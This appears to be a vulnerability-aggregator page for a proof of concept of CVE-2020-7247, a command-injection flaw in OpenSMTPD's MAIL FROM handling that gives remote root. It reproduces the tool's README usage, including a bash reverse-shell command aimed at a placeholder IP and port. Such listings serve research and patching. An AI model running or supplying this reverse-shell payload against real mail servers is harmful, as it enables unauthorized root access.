CVE-2020-7247 PoC — Openbsd Opensmtpd代码问题漏洞

Source

https://github.com/bytescrappers/CVE-2020-7247

Associated Vulnerability

Title:Openbsd Opensmtpd代码问题漏洞 (CVE-2020-7247)
Description:smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Description

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

Readme

# CVE-2020-7247

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user


### How to use?

```python3 getShell.py <targetIp> <targetPort> <command>```


If you need a reverse shell then run it like this

```python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'```


## Important

Change some stuffs in this exploit like RCPT to and something(if needed)



See this article for more clear explaination

https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!